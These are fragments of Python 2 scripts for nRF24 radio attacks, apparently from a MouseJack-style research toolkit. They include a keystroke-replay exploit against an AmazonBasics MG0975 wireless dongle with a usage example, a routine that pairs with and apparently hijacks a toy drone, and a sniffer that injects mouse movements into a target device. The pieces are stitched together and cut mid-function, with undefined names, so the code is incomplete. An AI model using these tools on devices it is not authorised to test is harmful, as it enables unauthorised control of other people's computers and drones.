#!/usr/bin/env python2 ''' Author: xswxm Blog: xswxm.com Send payloads 1,2,3,4,5,6,7,8,9,0 to Amazonbasics MG0975 dongle continuously e.g.: sudo python exp_attacker.py -l -a 61:8E:9C:CD:03 -f 74 -n 200 ''' import logging, time from lib import common common.init_args('./exp_attacker.py') common.parser.add_argument('-a', '--address', type=str, help='Address to sniff, following as it changes channels', required=True) common.parser.add_argument('-f', '--channel', type=int, help='RF channel', default=0) common.parser.add_argument('-n', '--times', type=int, help='Replay times', default=0) common.parse_and_init() channel = common.args.channel n = common.args.times # 0x27 represents 'a' in this case p = 0x27 # Parse the prefix address address = common.args.address.replace(':', '').decode('hex')[::-1][:5] # Put the radio in sniffer mode (ESB w/o auto ACKs) common.radio.enter_sniffer_mode(address) # Set channel common.radio.set_channel(channel)
logging.debug('CRC Failure') state = SEARCHING continue # Pairing is complete elif rx_packet.aileron == 1: time.sleep(0.25) logging.debug('Paired') state = PAIRED break logging.info("Done Pairing") return vid # Init command line args common.init_args('./fly-fly-away.py') common.parse_and_init() # Put the radio in promiscuous mode (generic) common.radio.enter_promiscuous_mode_generic('\x71\x0F\x55', common.RF_RATE_1M) # Tune to 2402 MHz common.radio.set_channel(2) # Pair to a drone vid = pair_drone() # Fly, fly away! fly_fly_away(vid)
def main(): global x, y, running mouse_th = threading.Thread(target=read_mouse_file, args=()) mouse_th.start() # # Start keyboard listener # listener = Listener( # on_press=on_press, # on_release=on_release) # # listener.start() # Keep alive payload 00:40:01:18:A7 # Parse command line arguments and initialize the radio common.init_args('./nrf24-sniffer.py') common.parser.add_argument( '-a', '--address', type=str, help='Address to sniff, following as it changes channels', required=True) common.parser.add_argument('-t', '--timeout', type=float, help='Channel timeout, in milliseconds', default=100) common.parser.add_argument( '-k', '--ack_timeout', type=int, help='ACK timeout in microseconds, accepts [250,4000], step 250', default=250) common.parser.add_argument('-r', '--retries', type=int, help='Auto retry limit, accepts [0,15]', default=1, choices=xrange(0, 16), metavar='RETRIES') common.parser.add_argument('-p', '--ping_payload', type=str, help='Ping payload, ex 0F:0F:0F:0F', default='00:40:01:18:A7', metavar='PING_PAYLOAD') common.parse_and_init() # Parse the address address = common.args.address.replace(':', '').decode('hex')[::-1][:5] address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1]) if len(address) < 2: raise Exception('Invalid address: {0}'.format(common.args.address)) # Put the radio in sniffer mode (ESB w/o auto ACKs) common.radio.enter_sniffer_mode(address) # Convert channel timeout from milliseconds to seconds timeout = float(common.args.timeout) / float(1000) print('Payload') print(common.args.ping_payload) # Parse the ping payload ping_payload = common.args.ping_payload.replace(':', '').decode('hex') # Format the ACK timeout and auto retry values ack_timeout = int(common.args.ack_timeout / 250) - 1 ack_timeout = max(0, min(ack_timeout, 15)) retries = max(0, min(common.args.retries, 15)) # Sweep through the channels and decode ESB packets in pseudo-promiscuous mode last_ping = time.time() channel_index = 0 while running: # Follow the target device if it changes channels if time.time() - last_ping > timeout: # First try pinging on the active channel if not common.radio.transmit_payload(ping_payload, ack_timeout, retries): # Ping failed on the active channel, so sweep through all available channels success = False for channel_index in range(len(common.channels)): common.radio.set_channel(common.channels[channel_index]) if common.radio.transmit_payload(ping_payload, ack_timeout, retries): # Ping successful, exit out of the ping sweep last_ping = time.time() logging.debug('Ping success on channel {0}'.format( common.channels[channel_index])) success = True break # Ping sweep failed if not success: logging.debug('Unable to ping {0}'.format(address_string)) # Ping succeeded on the active channel else: logging.debug('Ping success on channel {0}'.format( common.channels[channel_index])) last_ping = time.time() # Try to send mouse packets if arrow keys has been pressed #if x != 0 or y != 0: if not q.empty(): val = struct.unpack('3b', q.get()) x = val[1] y = val[2] mouse_payload = build_payload(0, x, y, 0, 0) print(mouse_payload) common.radio.transmit_payload(mouse_payload.decode('hex'), ack_timeout, retries) # Receive payloads value = common.radio.receive_payload() if value[0] == 0: # Reset the channel timer last_ping = time.time() # Split the payload from the status byte payload = value[1:] # Log the packet logging.info('{0: >2} {1: >2} {2} {3}'.format( common.channels[channel_index], len(payload), address_string, ':'.join('{:02X}'.format(b) for b in payload))) # End of main loop listener.stop()